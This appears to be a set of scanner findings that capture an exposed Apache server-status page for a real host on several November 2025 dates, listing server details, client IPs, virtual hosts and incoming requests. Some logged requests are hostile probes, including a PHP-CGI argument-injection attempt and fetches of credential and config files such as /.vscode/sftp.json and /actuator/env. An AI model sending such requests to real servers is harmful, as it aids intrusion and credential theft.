2.062605344148817080.00.011171.51 172.71.124.218h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-33336287500/15/35613_ 0.963015172158539150.00.051160.82 172.70.42.73h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-33336287500/14/35417_ 1.153015335187354020.00.071242.96 104.23.209.53h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33336287510/6/42046_ 0.885600178849990.00.001328.12 104.23.202.88h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33336287510/5/42748_ 1.9227860211662470.00.001357.96 172.68.135.87h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33336287510/11/42345_ 0.4027810206532140.00.011297.47 167.88.165.67http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33336287510/19/42144_ 1.152786188198509150.00.041273.59 172.71.124.13h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33336287510/8/42851_ 1.135650177229780.00.221338.47 172.69.65.78h2tandemsl.com:443idle, streams: 0/1/0/0/1 (open/recv/resp/push/rst) 1-33336287510/9/43411_ 2.585602186812760.00.031263.51 172.69.65.78http/1.1tandemsl.com:443GET /seguridad-industrial-blog/plan-de-autoproteccion-que-es/ H 1-33336287510/10/42672_ 0.8827820226485500.00.011288.91 104.23.202.88h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33336287510/13/43140_ 0.8827820179322500.00.011261.32 104.23.202.212h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33336287510/4/41441_ 0.885645386949287677750.00.001176.30 104.23.202.130h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33336287510/22/42826_ 1.2327816021416176070.00.051220.59 172.71.131.9h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/16/38845_ 0.8527810189716380.00.011154.34 104.23.202.94h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-33336287550/16/37906_ 0.3927810232913350.00.011083.35 52.54.213.197http/1.1pre.relehse.com:80done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-33336287550/26/38603_ 2.002436203254426460.00.031172.14 172.70.47.114h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/13/37831_ 1.8827862179673800.00.011128.84 172.68.134.112h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/6/38073_ 1.1424318152472820.00.041321.35 111.7.96.172http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/11/38442_ 0.3924310175643830.00.011134.09 111.7.96.172http/1.1 2-33336287550/7/38215_ 0.8527810170197060.00.011156.67 104.23.202.126h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/22/38255_ 0.8527860179766690.00.021136.49 172.64.194.12h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/10/38533_ 0.3951340181872490.00.011296.89 111.7.96.172http/1.1 2-33336287550/7/38389_ 1.8627864209766650.00.011165.84 172.68.135.204h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/61/40586_ 6.2020239461310.00.991270.94 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-33336288570/64/39341_ 6.04030188666960.02.351143.05 162.158.122.71h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/75/40350_ 6.2000198915850.01.061267.23 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-33336288570/51/39691_ 6.1920248834630.07.831288.51 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 3-33336288570/45/39702_ 6.11230169588480.00.631201.11 172.68.134.235h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/84/39716_ 6.2010178020830.01.571229.02 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-33336288570/57/40024_ 6.1950196793360.00.731344.66 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 3-33336288570/62/40071_ 6.175228276612450.01.081288.99 172.71.218.200h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/60/39334_ 6.014417825635390.01.181252.78 172.64.223.154h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/50/40540_ 6.2000318769950.00.931288.07 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-33336288860/77/34227_ 6.4520305320290.01.181098.57 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 4-33336288860/84/34284_ 6.22336146544490.01.321158.90 162.158.123.72h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-33336288860/88/34400_ 6.4510148493360.02.601200.58 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-33336288860/80/34707_ 6.4400162236810.00.911070.19 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 4-33336288860/83/34162_ 6.4430167325100.01.441063.34 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc8272d7e62
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 10-Nov-2025 07:26:40 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 322 Parent Server MPM Generation: 321 Server uptime: 58 days 19 hours 5 minutes 37 seconds Server load: 0.09 0.14 0.16 Total accesses: 1834783 - Total Traffic: 56.8 GB - Total Duration: 1055127329 CPU Usage: u223.57 s239.06 cu10031.6 cs5642.2 - .318% CPU load .361 requests/sec - 11.7 kB/second - 32.5 kB/request - 575.069 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03323830no0yes010000 13323827no0yes010000 23323961no1yes19000 33323825no1yes010000 43323826no0yes010000 Sum502 149000 _________________________W________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-32133238300/47/34534_ 21.8717490274926230.00.221273.87 51.68.236.69http/1.1barrerasdecontencion.com:443GET / HTTP/1.1 0-32133238300/54/33968_ 21.10776299429249690.00.481159.80 104.23.211.83h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32133238300/59/34286_ 21.69704300146097610.07.421174.38 172.71.194.25h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32133238300/46/34271_ 20.917760163966740.00.181189.01 162.158.123.62h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32133238300/51/34580_ 21.63699388152925720.00.401188.96 104.23.209.91h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32133238300/50/34686_ 20.926990160235790.00.361178.61 188.114.111.229h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-32133238300/79/34716_ 21.871741229000130.00.461084.73 51.68.236.69http/1.1barrerasdecontencion.com:443GET /robots.txt HTTP/1.1 0-32133238300/39/34172_ 19.381690144585290.00.361133.52 51.68.236.69http/1.1 0-32133238300/49/34524_ 21.06807394155330580.00.661125.64 172.70.43.209h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32133238300/56/34361_ 21.66781386183321520.01.301217.58 172.71.194.24h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32133238270/501/39433_ 38.89696331166275130.08.641244.64 172.70.43.209h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-32133238270/496/40097_ 38.90716294203052680.08.121286.79 172.68.245.11h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32133238270/485/39720_ 38.77710407195764060.07.941201.45 172.69.17.163h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-32133238270/533/39500_ 38.81714335190042200.012.091142.46 104.23.213.139h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-32133238270/530/40311_ 38.92705326168304630.08.441237.59 172.70.134.213h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32133238270/477/40894_ 38.93701306178242560.08.161218.34 172.70.134.213h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-32133238270/548/40072_ 38.89696345216135610.09.141195.70 172.70.43.209h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-32133238270/516/40682_ 38.82710284168416750.07.461186.23 172.70.39.195h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32133238270/522/38883_ 38.91715339166034550.010.681106.84 172.68.245.11h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-32133238270/547/40231_ 38.86714365399386060.08.931109.40 172.70.175.108h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32133239610/539/36811_ 40.3580183394170.013.831080.96 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 2-32133239610/505/35846_ 40.3620226210850.010.141016.91 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-32133239610/533/36588_ 40.3710247855200.011.661092.30 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-32133239610/510/35781_ 40.32131172468960.061.371051.03 162.158.120.157h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32133239610/482/36070_ 40.2680145564000.07.981266.77 104.23.211.210h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32133239610/483/36466W 40.3500164837360.034.091087.21 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-32133239610/501/36278_ 40.309358164101360.011.201083.44 162.158.163.32h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32133239610/512/36128_ 40.3590172459440.012.101096.81 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 2-32133239610/491/36524_ 40.28017167764640.09.561200.79 162.158.123.72h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32133239610/521/36453_ 40.3710192990540.08.341120.41 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-32133238250/237/39822_ 28.9440236744540.03.651255.81 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-32133238250/263/38538_ 28.9400186550430.04.301124.74 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-32133238250/240/39521_ 28.9400196865310.05.031239.56 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 3-32133238250/209/38912_ 28.9310246413510.03.921265.55 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 3-32133238250/226/38921_ 28.9420167471790.02.681183.20 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-32133238250/240/38912_ 28.784160175854270.02.641190.85 172.70.142.140h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32133238250/229/39188_ 28.9430194463630.03.341313.76 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-32133238250/220/39240_ 28.9430274501980.03.441257.86 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-32133238250/215/38574_ 28.9330823569010.04.461230.53 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 3-32133238250/257/39712_ 28.9400316584780.03.461268.75 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-32133238260/379/33635_ 39.49376325303172020.028.731087.02 172.71.190.38h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-32133238260/395/33722_ 39.53800318145081690.07.351150.41 162.158.79.50h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-32133238260/375/33780_ 39.347800145618190.06.461164.54 188.114.111.243h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-32133238260/393/34134_ 39.137950161079360.06.771038.12 207.154.197.113http/1.1relehse.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-32133238260/374/33573_ 39.34795616577951
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc84511a95a
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 08-Nov-2025 05:43:07 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 313 Parent Server MPM Generation: 312 Server uptime: 56 days 17 hours 22 minutes 4 seconds Server load: 0.12 0.09 0.09 Total accesses: 1793140 - Total Traffic: 55.7 GB - Total Duration: 1031055199 CPU Usage: u120.8 s166.2 cu9868.34 cs5530.85 - .32% CPU load .366 requests/sec - 11.9 kB/second - 32.6 kB/request - 575 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03174832no0yes010000 13174830no1yes19000 23174960no1yes010000 33174827no0yes010000 43174828no0yes010000 Sum502 149000 ______________W___________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-31231748320/3/34061_ 0.3013152270480740.00.091268.55 172.70.94.11h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31231748320/2/33508_ 0.82130420813820.00.091153.41 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/graphql HTTP/1.1 0-31231748320/2/33822_ 0.35120144596790.00.091159.81 170.106.35.187http/1.1barrerasdecontencion.com:80GET / HTTP/1.1 0-31231748320/1/33796_ 0.8320155902090.00.001183.00 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-31231748320/3/34118_ 0.680474142857470.00.031183.09 172.68.10.13h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31231748320/0/34238_ 0.0046029159084780.00.001172.94 138.197.191.87http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31231748320/1/34222_ 0.194600222806900.00.001078.73 139.59.143.102http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31231748320/2/33695_ 0.761960139581940.00.001126.81 81.199.26.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /development/iinfo.php HTTP/1.1 0-31231748320/2/34050_ 0.301960151111180.00.091119.89 81.199.26.23http/1.1 0-31231748320/2/33860_ 0.82130176516700.00.091210.59 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api HTTP/1.1 1-31231748300/10/38798_ 1.2590163976870.00.081231.84 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 1-31231748300/9/39460_ 1.2550200682570.00.031273.76 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-31231748300/14/39101_ 1.239850193684100.00.121189.78 104.23.203.156h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31231748300/14/38825_ 1.2610187636800.00.271125.96 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-31231748300/8/39650W 0.9800166048280.00.171223.23 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-31231748300/11/40281_ 1.2530176087090.00.491205.56 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-31231748300/9/39383_ 1.2510213801980.00.141181.61 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-31231748300/17/40037_ 1.2510166265980.00.421174.82 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 1-31231748300/11/38227_ 1.185170163924570.00.011091.12 172.69.6.8h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31231748300/17/39558_ 1.2600396962420.00.151096.22 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-31231749600/20/35132_ 1.4740176259090.00.141034.93 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-31231749600/20/34228_ 1.3600211471510.00.36980.70 108.162.245.9h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31231749600/21/34924_ 1.4730237993140.00.361057.31 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-31231749600/19/34134_ 1.4750165329530.00.19965.72 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 2-31231749600/14/34466_ 1.4810134267670.00.161236.76 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-31231749600/18/34855_ 1.3250154404290.01.011031.61 85.203.15.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31231749600/24/34625_ 1.4750152775850.00.361041.65 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 2-31231749600/16/34507_ 1.4710162832050.00.191060.18 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 2-31231749600/19/34865_ 1.4720156770260.00.401167.40 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 2-31231749600/13/34815_ 1.4740184908110.00.211052.02 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 3-31231748270/1/38920_ 0.1816080232850260.00.001237.28 139.59.143.102http/1.1relehse.com:443GET /api/swagger.json HTTP/1.1 3-31231748270/0/37585_ 0.0016060182477730.00.001100.88 4.241.170.137http/1.1barrerasdecontencion.com:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-31231748270/1/38619_ 0.1816060193457910.00.001214.27 139.59.143.102http/1.1relehse.com:443GET /about HTTP/1.1 3-31231748270/0/38047_ 0.0018190240582930.00.001239.78 4.241.170.137http/1.1barrerasdecontencion.com:80GET /w.php HTTP/1.1 3-31231748270/1/37977_ 0.2516140163835700.00.001159.90 172.71.167.103h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-31231748270/0/38020_ 0.0016130172512920.00.001171.01 4.241.170.137http/1.1barrerasdecontencion.com:80GET /config.php HTTP/1.1 3-31231748270/1/38285_ 0.2516110190358650.00.001288.60 198.41.227.56h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-31231748270/0/38323_ 0.0016110271180370.00.001218.59 4.241.170.137http/1.1barrerasdecontencion.com:80GET /a.php HTTP/1.1 3-31231748270/0/37659_ 0.0016080818176320.00.001208.13 4.241.170.137http/1.1barrerasdecontencion.com:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-31231748270/0/38804_ 0.0016080313562060.00.001248.74 4.241.170.137http/1.1barrerasdecontencion.com:80GET /V3.php HTTP/1.1 4-31231748280/1/33147_ 0.1618220300982900.00.001052.81 139.59.143.102http/1.1relehse.com:443GET /.vscode/sftp.json HTTP/1.1 4-31231748280/0/33217_ 0.001819111142849820.00.001138.54 4.241.170.137http/1.1barrerasdecontencion.com:443GET /config.php HTTP/1.1 4-31231748280/1/33302_ 0.2216140143711930.00.001152.84 172.68.27.187h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-31231748280/0/33641_ 0.0016130158925400.00.001024.93 172.71.255.133h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-31231748280/0/33098_ 0.00160899163531510.00.001041.94 4.241.170.137http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-31231
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc8916b2b8f
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 06-Nov-2025 11:35:27 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 305 Parent Server MPM Generation: 304 Server uptime: 54 days 23 hours 14 minutes 24 seconds Server load: 0.24 0.33 0.74 Total accesses: 1742140 - Total Traffic: 53.8 GB - Total Duration: 1009010074 CPU Usage: u195.77 s195.57 cu9479.43 cs5320.01 - .32% CPU load .367 requests/sec - 11.9 kB/second - 32.4 kB/request - 579.179 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02984494no0yes010000 12984493no0yes19000 22984633no1yes010000 32984491no4yes010021 42984492no0yes010000 Sum505 149021 _______________W__________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-30429844940/65/33271_ 10.735121267595280.01.481209.46 91.204.127.221http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-30429844940/69/32778_ 11.165170418129300.01.251119.49 188.114.111.214h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-30429844940/68/33074_ 10.9565537141333600.02.661138.14 31.222.123.131h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-30429844940/73/33064_ 10.95655896153274560.02.821153.74 2.136.78.3h2relehse.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 0-30429844940/73/33325_ 10.9310490140215660.01.301115.52 162.158.122.179h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-30429844940/65/33457_ 10.809200156330300.00.661156.23 91.204.127.221http/1.1relehse.com:443GET /admin_layout/plugins/jtree-drag-drop/css/folder-2.png HTTP 0-30429844940/98/33362_ 10.7310490219904320.00.871034.77 91.204.127.221http/1.1done, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 0-30429844940/80/32881_ 10.98512733136977810.06.231087.08 2.136.78.3h2relehse.com:443idle, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 0-30429844940/61/33219_ 10.949200148044160.00.981083.38 162.158.120.183h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-30429844940/62/33083_ 11.029250173730000.01.011181.94 162.158.120.144h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-30429844930/419/38442_ 31.304634162257210.045.951224.84 172.69.195.123h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-30429844930/444/39112_ 31.241711199426560.032.261267.12 91.204.127.221http/1.1 1-30429844930/473/38782_ 31.07575541192599210.036.251184.02 2.136.78.3h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-30429844930/418/38501_ 31.4557049186808960.022.061114.27 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-30429844930/432/39338_ 31.483260165001070.019.901215.72 91.204.127.221http/1.1 1-30429844930/479/39941W 31.6000174944920.034.731196.65 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-30429844930/449/39032_ 31.225701212737080.021.811167.12 91.204.127.221http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-30429844930/422/39698_ 31.6547120164636750.039.751168.92 91.204.127.221http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 1-30429844930/403/37875_ 31.234662162832360.035.721063.56 91.204.127.221http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-30429844930/375/39222_ 31.5917120396118480.014.441088.64 51.163.26.97h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-30429846330/726/34066_ 35.3200170934860.044.76974.47 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-30429846330/667/33203_ 35.3310207253300.019.60927.90 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 2-30429846330/648/33926_ 35.3310233914190.033.851009.95 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 2-30429846330/655/33143_ 35.35130160195590.024.68933.05 162.158.123.73h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-30429846330/672/33485_ 35.3510129922330.030.701192.84 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 2-30429846330/634/33801_ 35.3600149667350.049.53984.93 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-30429846330/636/33618_ 35.360867148432120.019.831011.48 172.71.164.83h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-30429846330/628/33470_ 35.3210158259660.039.721022.19 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api HTTP/1.1 2-30429846330/628/33800_ 35.301295152505550.029.461068.73 2.136.78.3h2relehse.com:443idle, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 2-30429846330/694/33785_ 35.3310180435780.022.801018.30 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/graphql HTTP/1.1 3-30429844910/236/36957_ 18.8600223858230.06.981164.74 3.8.77.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /test.php.orig HTTP/1.1 3-30429844910/241/35704_ 18.8700175331100.04.891042.90 3.8.77.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /info.php.backup HTTP/1.1 3-30429844910/243/36663_ 18.8700184211350.06.791164.49 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-30429844910/280/36129_ 18.8600232369190.06.401179.59 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-30429844910/232/36036_ 18.8700155588960.04.931088.47 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-30429844910/264/36092_ 